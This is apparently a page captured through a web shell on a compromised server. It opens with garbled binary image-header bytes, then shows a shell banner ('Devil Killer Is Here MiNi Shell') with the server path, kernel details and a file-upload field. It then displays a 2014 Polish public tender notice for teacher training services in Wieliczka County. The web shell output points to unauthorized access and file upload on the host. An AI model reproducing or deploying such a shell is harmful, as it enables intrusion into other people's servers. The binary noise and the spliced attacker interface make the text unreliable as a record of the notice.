JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140320/95076-N-2014.html

<p class="kh_header"><b>Wieliczka: Świadczenie usług szkoleniowych i konsultacyjnych w roku 2014 w ramach projektu Centrum Rozwoju Edukacji w Powiecie Wielickim  edycja 2</b><br>
<b>Numer ogłoszenia: 95076 - 2014; data zamieszczenia: 20.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biuro Obsługi Placówek Oświatowych Powiatu , ul. Kopernika 2, 32-020 Wieliczka, woj. małopolskie, tel. 12 284 89 48, faks 12 284 89 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieliczka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna powiatu wielickiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług szkoleniowych i konsultacyjnych w roku 2014 w ramach projektu Centrum Rozwoju Edukacji w Powiecie Wielickim  edycja 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/. Przedmiotem zamówienia jest świadczenie usług szkoleniowych i konsultacyjnych w roku 2014 w ramach projektu Centrum Rozwoju Edukacji w Powiecie Wielickim, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
2/. Każda usługa składa się z: 
1) opracowania materiałów dydaktycznych (szkoleniowych) dla szkolenia,
2) przeprowadzenia szkolenia dla członków Rady Pedagogicznej placówki oświatowej objętej projektem w wymiarze 4 godzin,
3) ustalenia z członkami Rady Pedagogicznej placówki oświatowej objętej projektem przy jednoczesnej akceptacji Szkolnego Organizatora Rozwoju Edukacji terminów realizacji konsultacji,
4) realizacji konsultacji dla członków Rady Pedagogicznej placówki oświatowej objętej projektem w wymiarze 5 godzin. 
3/. Odbiorca usługi: Usługa przeznaczona jest dla Beneficjentów Ostatecznych projektu - członków rad pedagogicznych oraz uczestników sieci współpracy. 
4/. Miejsce realizacji usług: teren powiatu wielickiego. Usługa będzie realizowana w szkołach i przedszkolach biorących udział w projekcie, zlokalizowanych na terenie Powiatu Wielickiego.
5/. Liczba usług: 45
6/. Przewidywana ilość osób uczestnicząca w szkoleniu: średnio 20 osób
7/. Czas realizacji: usługi będą realizowane sukcesywnie od dnia podpisania umowy do dnia 31sierpnia 2014 roku. Ze względu na przyjęty harmonogram wsparcia w poszczególnych szkołach. 
8/. Spotkania będą realizowane w dni powszednie w godzinach wolnych od nauki szkolnej (popołudnia i wieczory) oraz w soboty. Zamawiający nie przewiduje realizacji więcej niż 3 usług w danym dniu
9/. Obowiązki Wykonawcy:
1). opracowanie i przekazanie najpóźniej 3 dni przed datą realizacji szkolenia Szkolnemu Organizatorowi Rozwoju Edukacji materiałów dydaktycznych (szkoleniowych), które zostaną użyte w czasie realizacji szkolenia, 
2). realizacja kursu przez wykwalifikowane osoby, posiadające doświadczenie w prowadzeniu kursów z tematu objętego przedmiotową umową,
3) po zakończeniu kursu wypełnienie z uczestnikami ankiety ewaluacyjnej, przygotowanej zgodnie z załącznikiem do umowy, dotyczącej danego rodzaju kursu,
4) prowadzenie karty konsultacji według wzoru stanowiącego załącznik do umowy i przedstawienie jej w oryginale Zamawiającemu po zakończeniu realizacji usługi..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 79.41.90.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 45.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania odpowiednim osobami zdolnymi do wykonania zamówienia Zamawiający uzna Wykonawców, którzy dysponują co najmniej jedną osobą dla każdej z części, posiadającą w:
Część 1 Wykształcenie: wyższe (psycholog, nauczyciel wychowania przedszkolnego, pedagog) i doświadczenie: polegające na zrealizowaniu min. 5 szkoleń z omawianej tematyki oraz co najmniej dwuletnie doświadczenie w pracy z grupą dzieci w wieku przedszkolnym. 
Część 2 Wykształcenie: wyższe, ukończony kurs lub szkolenie dotyczące prowokacyjnych, agresywnych zachowań uczniów przygotowujący do prowadzenia szkoleń Rad Pedagogicznych i co najmniej 5 letnie doświadczenie w prowadzeniu szkoleń i warsztatów dla rad Pedagogicznych, doświadczenie w pracy z dziećmi i młodzieżą o prawidłowym i zaburzonym rozwoju psychoruchowym. 
Część 3 Wykształcenie: wyższe - psycholog oraz certyfikat,kurs lub uprawnienia trenerskie i doświadczenie wyrażające się co najmniej 2 lata pracy w szkole podstawowej 
Część 4 Wykształcenie: wyższe i doświadczenie wyrażające się w realizacji o najmniej 5 szkoleń z omawianej tematyki i dysponowaniu praktycznym, co najmniej dwuletnim doświadczeniem w pracy metodą projektową z dziećmi w szkole podstawowej. 
Część 5 Wykształcenie: wyższe (psycholog, psychiatra)i doświadczenie wyrażające się w realizacji co najmniej 5 szkoleń z omawianej tematyki, dysponowaniu wiedzą praktyczną w zakresie pomocy dzieciom i młodzieży oraz co najmniej 2 letnim zatrudnieniem w ośrodkach psychologicznej pomocy dla dzieci i młodzieży jako osoba zajmująca się terapią lub socjoterapią dzieci i młodzieży. 
Część 6 Wykształcenie: wyższe, uprawnienia trenerskie, ukończony kurs kwalifikacyjny z pedagogiki twórczości i co najmniej 5 letnie doświadczenie w zakresie prowadzenia szkoleń i warsztatów dla nauczycieli oraz co najmniej 5 letnie doświadczenie w pracy z uczniami metodami aktywizującymi 
Część 7 dla szkolenia: wykształcenie wyższe psycholog i co najmniej 3 lata doświadczenia w pracy z trudną młodzieżą w instytucjach edukacyjnych lub pomocy społecznej. dla konsultacji: Wykształcenie wyższe pedagogiczne i doświadczenie: czynny egzaminator egzaminów maturalnych lub przedmiotów zawodowych. 
Część 8 Wykształcenie: wyższe - psycholog i co najmniej 3 lata doświadczenia w pracy z trudną młodzieżą w instytucjach edukacyjnych lub pomocy społecznej.
Część 9 Wykształcenie: wyższe - psycholog lub pedagog i co najmniej 2 lata pracy w szkole ponadgimnazjalnej z wykorzystaniem metod i technikach motywujących. 
Część 10 Wykształcenie: wyższe - psycholog i doświadczenie polegające na przeprowadzeniu co najmniej 5 szkoleń dla Rad Pedagogicznych oraz doświadczeniu w pracy z dziećmi, młodzieżą.
Część 11 Wykształcenie: wyższe, certyfikat trenerski z zakresu umiejętności komunikacyjnych i budowania i zarządzania zespołem i doświadczenie polegające na co najmniej 5 przeprowadzonych szkoleniach Rad Pedagogicznych z zakresu Efektywna organizacja pracy zespołów nauczycielskich
Część 12 Wykształcenie: wyższe, psychologiczne lub pedagogiczne, nauczyciel dyplomowany oraz doświadczenie w pracy w placówce oświatowej (gimnazjum, szkole podstawowej) co najmniej 15 lat, w tym doświadczenie w pracy nauczyciela przedmiotowego co najmniej 3 lata, doświadczenie w pracy z nauczycielami wyrażające się w realizacji co najmniej 5 szkoleń dla nauczycieli (w tym o tematyce Jak pomóc uczniom osiągnąć sukces edukacyjny?,Praca metodami aktywizującymi, Wspomaganie ucznia ze specjalnymi potrzebami edukacyjnymi.)
Część 13 Wykształcenie: wyższe, psychologiczne lub pedagogiczne, nauczyciel dyplomowany oraz doświadczenie w pracy w placówce oświatowej (gimnazjum, szkole podstawowej) co najmniej 15 lat, w tym doświadczenie w pracy nauczyciela przedmiotowego co najmniej 3 lata, doświadczenie w pracy z nauczycielami wyrażające się w realizacji co najmniej 5 szkoleń dla nauczycieli (w tym o tematyce Jak pomóc uczniom osiągnąć sukces edukacyjny?, Praca metodami aktywizującymi, Wspomaganie ucznia ze specjalnymi potrzebami edukacyjnymi.)
Część 14 Wykształcenie: wyższe, ponadto edukacja pod kątem coachingu (minimum 90 godzin edukacyjnych) w szkołach coachingu o programach posiadających akredytacje międzynarodową a także akredytację Kuratorium Oświaty oraz wykształcenie pod kątem pracy trenerskiej (nie mniej niż 90 godzin edukacyjnych) w szkołach posiadających programy rekomendowane przez Polskie Towarzystwo Psychologiczne, doświadczenie w pracy coachingowej wyrażające się w realizacji powyżej 300 godzin coachingu oraz doświadczenie w prowadzeniu mentoringu dla młodzieży. Dla konsultacji z coachingu sportowego  dodatkowo doświadczenie w prowadzeniu coachingu sportowego wyrażające się w realizacji co najmniej 300 godzin zajęć.
Część 15  Wykształcenie: wyższe. Doświadczenie: 3 letnie doświadczenie szkoleniowe lub nauczycielskie w zakresie stosowania technologii TIK, a w szczególności tablicy interaktywnej, potwierdzone publikacjami na ten temat lub doświadczenie w przeprowadzeniu 5 szkoleń w zakresie zastosowania technologii TIK.
Część 16 Wykształcenie: wyższe - psycholog. Doświadczenie: w prowadzeniu zajęć dla studentów, rodziców, nauczycieli co najmniej 500 godzin. 
Część 17  Wykształcenie: wyższe pedagogiczne lub psychologiczne. Doświadczenie: co najmniej 5 szkoleń z omawianej tematyki i: dysponuje praktycznym, co najmniej pięcioletnim doświadczeniem w pracy w charakterze wychowawcy klasy lub pedagoga/psychologa szkolnego lub jest konsultantem/ metodykiem w w/w zakresie lub jest/był zatrudniony w Poradni P-P lub innej instytucji zajmującej się wspieraniem pracy wychowawców jako trener.
Część 18 Wykształcenie: wyższe, uprawnienia trenerskie, ukończony kurs kwalifikacyjny z pedagogiki twórczości i co najmniej 3 letnie doświadczenie w zakresie prowadzenia szkoleń i warsztatów dla nauczycieli oraz co najmniej 3 letnie doświadczenie w pracy z uczniami metodami aktywizującymi .
Część 19 Wykształcenie wyższe - pedagog, specjalista terapii pedagogicznej. Doświadczenie w zakresie prowadzenia szkoleń dla Rad Pedagogicznych szkół (co najmniej 10 szkoleń), doświadczenie w zakresie pracy z dziećmi i młodzieżą - w zakresie diagnozy przyczyn trudności szkolnych dzieci na etapie szkoły podstawowej. 
Część 20 Wykształcenie: wyższe, uprawnienia trenerskie, ukończony kurs kwalifikacyjny z pedagogiki twórczości i co najmniej 3 letnie doświadczenie w zakresie prowadzenia szkoleń i warsztatów dla nauczycieli oraz co najmniej 3 letnie doświadczenie w pracy z uczniami metodami aktywizującymi .
Część 21 Wykształcenie wyższe. Doświadczenie w prowadzeniu szkoleń z zakresu ewaluacji wewnętrznej w szkołach (co najmniej 5 szkoleń). 
Część 22Wykształcenie wyższe - polonistyczne oraz  uprawnienia logopedyczne; studia lub kurs dotyczący nauczania języka polskiego jako obcego. Doświadczenie w pracy z dziećmi w wieku przedszkolnym z dysleksją, zaburzeniami mowy oraz dwujęzycznymi (co najmniej 1 rok). 
Część 23 Wykształcenie: wyższe. Doświadczenie:  co najmniej 5 szkoleń z omawianej tematyki oraz praktyczne, co najmniej dwuletnie doświadczenie w aktywnej pracy z grupą dzieci w wieku wczesnoszkolnym .
Część 24 Wykształcenie: wyższe: pedagog lub psycholog. Doświadczenie:  co najmniej 2 szkolenia z omawianej tematyki oraz praktyczne  co najmniej dwuletnie doświadczenie w pracy z dziećmi ze spektrum autyzmu w przedszkolu (np.  doświadczenie w pracy jako nauczyciel wspomagający w przedszkolu,  doświadczenie w pracy różnymi metodologiami nauczania Montessori, waldorfskie itp.)
Część 25 Wykształcenie: wyższe, uprawnienia trenerskie, ukończony kurs kwalifikacyjny z pedagogiki twórczości i co najmniej 3 letnie doświadczenie w zakresie prowadzenia szkoleń i warsztatów dla nauczycieli oraz co najmniej 3 letnie doświadczenie w pracy z uczniami metodami aktywizującymi 
Część 26 Wykształcenie wyższe - pedagog, specjalista terapii pedagogicznej. Doświadczenie w zakresie prowadzenia szkoleń dla Rad Pedagogicznych szkół (co najmniej 10 szkoleń), doświadczenie w zakresie pracy z dziećmi i młodzieżą - w zakresie diagnozy przyczyn trudności szkolnych dzieci na etapie szkoły podstawowej. 
Część 27 Wykształcenie: wyższe, uprawnienia trenerskie, ukończony kurs kwalifikacyjny z pedagogiki twórczości i co najmniej 3 letnie doświadczenie w zakresie prowadzenia szkoleń i warsztatów dla nauczycieli oraz co najmniej 3 letnie doświadczenie w pracy z uczniami metodami aktywizującymi 
Część 28 Wykształcenie: wyższe: pedagog lub psycholog. Doświadczenie:  co najmniej 2 szkolenia z omawianej tematyki oraz doświadczenie w pracy w szkole podstawowej lub gimnazjum. 
Część 29  Wykształcenie: wyższe: pedagog lub psycholog. Doświadczenie:  co najmniej 2 szkolenia z omawianej tematyki oraz doświadczenie w pracy w szkole podstawowej lub gimnazjum. 
Część 30 Wykształcenie: wyższe: pedagog lub psycholog.  co najmniej 2 szkolenia z omawianej tematyki oraz doświadczenie w pracy w poradni psychologiczno-pedagogicznej. 
Część 31 Wykształcenie: wyższe z przygotowaniem pedagogicznym Doświadczenie: wykonawca wykaże, że jest trenerem CEO w zakresie oceniania kształtującego lub wykonał co najmniej 5 szkoleń z omawianej tematyki i dysponuje praktycznym, doświadczeniem we wdrażaniu oceniania kształtującego w szkole (np. udział w programie SUS OK) lub jest konsultantem/ metodykiem w w/w zakresie.
Część 32 Wykształcenie: wyższe. Doświadczenie: wykonawca wykaże, że wykonał co najmniej 5 szkoleń z omawianej tematyki, ma praktyczne, co najmniej trzyletnie doświadczenie w aktywnej pracy z zastosowaniem technologii informacyjno-komunikacyjnej w szkole lub jest konsultantem/ metodykiem w w/w zakresie. 
Część 33 Wykształcenie: wyższe. Doświadczenie: wykonawca wykaże, że wykonał co najmniej 5 szkoleń z omawianej tematyki, ma praktyczne, co najmniej trzyletnie doświadczenie w aktywnej pracy w zakresie kreowania wizerunku placówki oświatowej lub innej instytucji.
Część 34 Wykształcenie: wyższe pedagogiczne lub psychologiczne.  Doświadczenie: co najmniej 2 letnie doświadczenie w prowadzeniu szkoleń i warsztatów Rad Pedagogicznych, doświadczenie w pracy z dziećmi i młodzieżą ze specjalnymi potrzebami edukacyjnymi.
Część 35 Wykształcenie wyższe: psycholog lub pedagog. Doświadczenie w prowadzeniu warsztatów dla nauczycieli: co najmniej 5 szkoleń o podobnej tematyce. 
Część 36  Wykształcenie wyższe: psycholog lub pedagog. Doświadczenie w prowadzeniu warsztatów dla nauczycieli: co najmniej 5 szkoleń o podobnej tematyce. 
Część 37 Wykształcenie wyższe: psycholog lub pedagog. Doświadczenie w prowadzeniu warsztatów dla nauczycieli: co najmniej 5 szkoleń o podobnej tematyce. 
Część 38 Wykształcenie wyższe: psycholog lub pedagog. Doświadczenie w prowadzeniu warsztatów dla nauczycieli: co najmniej 5 szkoleń o podobnej tematyce. 
Część 39 Wykształcenie: wyższe pedagogiczne. Doświadczenie: w pracy w szkole podstawowej co najmniej 2 lata oraz przeprowadzonych co najmniej 5 szkoleń dla Rad Pedagogicznych. 
Część 40 Wykształcenie: wyższe, uprawnienia trenerskie, ukończony kurs kwalifikacyjny z pedagogiki twórczości i co najmniej 3 letnie doświadczenie w zakresie prowadzenia szkoleń i warsztatów dla nauczycieli oraz co najmniej 3 letnie doświadczenie w pracy z uczniami metodami aktywizującymi 
Część 41 Wykształcenie: wyższe psycholog, terapeuta, psychiatra. Doświadczenie: co najmniej 2 lata pracy w specjalistycznej poradni lub na klinice zajmującej się dziećmi i młodzieżą lub innej placówce zajmującej się uczniami  o specjalnych potrzebach edukacyjnych oraz co najmniej 5 szkoleń o podobnej tematyce. 
Część 42 Wykształcenie: wyższe - nauczyciel wspomagający pracujący w przedszkolu, posiadający co najmniej pięcioletnie doświadczenie w pracy z dziećmi o szczególnych potrzebach edukacyjnych w tym szczególnie z dziećmi z autyzmem. 
Część 43 Wykształcenie: wyższe. Doświadczenie w prowadzeniu warsztatów dla nauczycieli: co najmniej 5 szkoleń o podobnej tematyce oraz co najmniej 2 lata doświadczenia w szkole podstawowej. 
Część 44 Wykształcenie: wyższe: Doświadczenie: nauczyciel dyplomowany, praktyk z minimum 10 letnim doświadczeniem, psycholog, psychoterapeuta, socjolog, doświadczony w pracy w specjalistycznej poradni psychologiczno - pedagogicznej, z doświadczeniem w pracy z dziećmi i ich rodzicami oraz w prowadzeniu szkoleń i warsztatów tematycznych dla nauczycieli i rodziców, specjalizującej się w zakresie pomocy diagnostyczno - terapeutycznej dla dzieci przedszkolnych.
Część 45 Wykształcenie: wyższe: Doświadczenie: nauczyciel dyplomowany, praktyk z minimum 10 letnim doświadczeniem, psycholog, psychoterapeuta, socjolog, doświadczony w pracy w specjalistycznej poradni psychologiczno - pedagogicznej, z doświadczeniem w pracy z dziećmi i ich rodzicami oraz w prowadzeniu szkoleń i warsztatów tematycznych dla nauczycieli i rodziców, specjalizującej się w zakresie pomocy diagnostyczno - terapeutycznej dla dzieci przedszkolnych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">szczegółowy program szkolenia dla każdej z wybranych części zamówienia</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/. Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy. 2/. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jego reprezentacji we właściwym rejestrze lub w Centralnej Ewidencji i Informacji o Działalności Gospodarczej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień zawartej umowy w okresie jej obowiązywania. W przypadku zmiany okoliczności mających wpływ na wysokość składek (pochodnych od wynagrodzenia), które Zamawiający zobowiązany jest ponieść z tytułu zawarcia umowy z osobą fizyczną, Zamawiający dopuszcza możliwość przeliczenia i zmiany ceny brutto zawartej w umowie z danym Wykonawcą</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wieliczka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Obsługi Placówek Oświatowych Powiatu, 32-020 Wieliczka ul. Kopernika 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2014 godzina 08:45, miejsce: Biuro Obsługi Placówek Oświatowych Powiatu, 32-020 Wieliczka ul. Kopernika 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




